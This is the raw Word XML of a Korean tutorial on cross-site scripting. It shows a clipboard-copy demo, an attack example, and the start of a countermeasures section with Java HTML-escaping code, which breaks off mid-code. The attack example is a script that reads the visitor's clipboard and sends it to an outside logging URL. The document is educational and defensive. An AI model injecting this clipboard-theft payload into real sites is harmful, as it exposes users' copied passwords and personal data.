              <w:t>="https://code.jquery.com/jquery-3.1.1.min.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CEA225" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2F3577" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3122EFC5" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>window.onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = function(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245534BB" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $(document).ready(function(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D4AD71" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr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clipboard = new Clipboard('.clipboard');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="410EBB24" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2E2DEA" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA4620C" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0052198A" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68AA78EE" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>일련번호</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> : &lt;input type = "text" id = "copy" value="8282"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEE2C55" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;button class="clipboard" data-clipboard-target="#copy"&gt; 복사 &lt;/button&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2CA8" w14:paraId="69EC9475" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="3798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09250A1B" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRPr="009C2CA8" w:rsidRDefault="009C2CA8" w:rsidP="00070285">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2CA8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D016780" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="00070285" w:rsidP="009C2CA8">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163697A1" wp14:editId="4763C511">
                  <wp:extent cx="5280212" cy="2330823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562"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5279367" cy="2330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082931" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="009C2CA8" w:rsidP="009C2CA8"/>
    <w:p w14:paraId="38210ABA" w14:textId="77777777" w:rsidR="00070285" w:rsidRPr="00EE7333" w:rsidRDefault="00070285" w:rsidP="009C2CA8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그 밖에도 </w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:t>Password”</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 패스워드 관리 프로그램을 사용하는 사용자들은 패스워드가 클립보드에 저장되어 있어 주의가 필요하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A557D0" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="00096F6F" w:rsidP="009C2C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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="00096F6F" w14:paraId="3095AC95" w14:textId="77777777" w:rsidTr="00065417">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7026A305" w14:textId="77777777" w:rsidR="0002704B" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1548FC91" w14:textId="77777777" w:rsidR="0002704B" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>new Image().</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 'http://springs-thursday.iptime.org/st-apps/logging/loggin.php?c=' + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>window.clipboardData.getData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('Text');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0E02FF" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00096F6F" w14:paraId="45E67F3B" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="304"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="790A8F97" w14:textId="0CB8B17A" w:rsidR="00096F6F" w:rsidRPr="00684E4C" w:rsidRDefault="00684E4C" w:rsidP="00684E4C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2CA8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25338E4A" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="00096F6F" w:rsidP="009C2CA8"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36ABC5D0" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRPr="009C2CA8" w:rsidRDefault="00096F6F" w:rsidP="009C2CA8"/>
    <w:p w14:paraId="76D08C0F" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>피싱 사이트로 이동</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A10F0" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>미리 구성한 피싱 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668899D5" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531"/>
    <w:p w14:paraId="218267A2" w14:textId="3A26B968" w:rsidR="008D2128" w:rsidRDefault="008D2128" w:rsidP="008D2128">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML 태그</w:t>
      </w:r>
      <w:r w:rsidR="004A0620">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 속성을</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이용한 스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE70DE" w14:textId="77777777" w:rsidR="005C1003" w:rsidRPr="004A0620" w:rsidRDefault="005C1003" w:rsidP="005C1003"/>
    <w:p w14:paraId="64CCC545" w14:textId="77777777" w:rsidR="005C1003" w:rsidRPr="005C1003" w:rsidRDefault="005C1003" w:rsidP="005C1003">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8D2FE" w14:textId="77777777" w:rsidR="008D2128" w:rsidRDefault="008D2128" w:rsidP="008D2128"/>
    <w:p w14:paraId="1CD273D5" w14:textId="448194BC" w:rsidR="004A0620" w:rsidRDefault="002C1CD1" w:rsidP="002C1CD1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5292C454" w14:textId="515119E5" w:rsidR="002955C1" w:rsidRPr="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955C1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS 공격과 동일하게 사용자에게 서비스를 나타내는 과정에서 발생되지만 공격 시 HTML 태그를 삽입한다는 차이점이 있다. 위험도는 낮지만 다양한 활용방법이 존재한다. 다음은 계정을 가로채는 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570A6A3B" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955C1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인 페이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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="002955C1" w14:paraId="46FB9E1F" w14:textId="77777777" w:rsidTr="004C1032">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="459A2EA1" w14:textId="54AA032A" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002955C1" w14:paraId="7EA52BF7" w14:textId="77777777" w:rsidTr="004C1032"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3DEDD79D" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="009C2CA8" w:rsidRDefault="002955C1" w:rsidP="004C1032">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2CA8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68757F65" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="004C1032"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2194A09D" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955C1"/>
    <w:p w14:paraId="5DE26081" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="002955C1" w14:paraId="44AE362B" w14:textId="77777777" w:rsidTr="004C1032">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="48216861" w14:textId="157D6C2C" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="004C1032">
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002955C1" w14:paraId="18D61101" w14:textId="77777777" w:rsidTr="004C1032">
        <w:trPr>
          <w:trHeight w:val="304"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6A60DCCC" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="00684E4C" w:rsidRDefault="002955C1" w:rsidP="004C1032">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2CA8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21035B66" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="004C1032"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="062FB355" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="002955C1" w:rsidRDefault="002955C1" w:rsidP="002C1CD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFF79F9" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="002C1CD1" w:rsidRDefault="002955C1" w:rsidP="002C1CD1"/>
    <w:p w14:paraId="33831578" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>결론</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB631A" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS 취약점은 </w:t>
      </w:r>
      <w:r w:rsidR="008D2128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252134D3" w14:textId="77777777" w:rsidR="00B625F3" w:rsidRPr="002955C1" w:rsidRDefault="00B625F3" w:rsidP="00010531"/>
    <w:p w14:paraId="6975B35C" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="005904AE" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>크로스</w:t>
      </w:r>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005904AE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 대응방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636EC53C" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B916F75" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D9B1F" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지에 악의적인 스크립트를 포함시켜 불특정 다수의 사용자들에게서 동작 시키는 공격인 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>스크립팅은</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 비교적 쉬운 테스트 코드로 인하여 쉽게 대응할 수 있을 것이라 생각할 수 있지만 상당한 복잡성을 가지고 있다. 이에 </w:t>
      </w:r>
      <w:r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>네이버의 XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 필터를 </w:t>
      </w:r>
      <w:r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>참고</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">하여 </w:t>
      </w:r>
      <w:r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">상세한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>대응방안을 자세히 알아보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4AFE7" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D213C" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C30DF5A" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>외부입력</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 값에 삽입된 스크립트 구문 작성 시 사용되는 특수문자를 HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>인코딩</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 문자로 치환하여 스크립트 구문의 동작을 막는다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F55065" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319FE39" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:t>별도의 제약사항 없이 모든 태그 무력화</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A87C7" w14:textId="77777777" w:rsidR="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00431F07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드</w:t>
      </w:r>
      <w:r w:rsidRPr="00431F07">
        <w:t xml:space="preserve"> 예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6"/>
        <w:gridCol w:w="9476"/>
      </w:tblGrid>
      <w:tr w:rsidR="00431F07" w14:paraId="0DBD6911" w14:textId="77777777" w:rsidTr="005904AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4B77CA8A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 xml:space="preserve">package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webfilt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14:paraId="4DA1E387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</w:p>
          <w:p w14:paraId="56A29240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 xml:space="preserve">import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java.util.Scann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14:paraId="35D183C8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 xml:space="preserve">import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java.util.regex.Patter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14:paraId="41B96407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 xml:space="preserve">import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java.util.regex.Match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14:paraId="003F2841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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00431F07">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> org.apache.commons.lang3.*;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F7F293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</w:p>
          <w:p w14:paraId="7021A447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>public class main {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A82CD0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14:paraId="2FCBFEB5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  <w:t xml:space="preserve">public static void main(String[]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args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) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF722BF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String message;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FCCDAF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String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escapeMessag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14:paraId="2B6B7350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String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unescapeMessag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14:paraId="54339B81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Scanner scan = new Scanner(System.in);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE17CBA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14:paraId="177AD5BF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while(true){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E66C29F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System.out.printl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"input message : ");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27453D7B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message =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scan.nextLin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); // 테스트 값 입력</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26546ADB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14:paraId="0F941EDD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System.out.printl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"Original : " + message);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4070CCD1" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
            <w:pPr>
              <w:ind w:left="800"/>
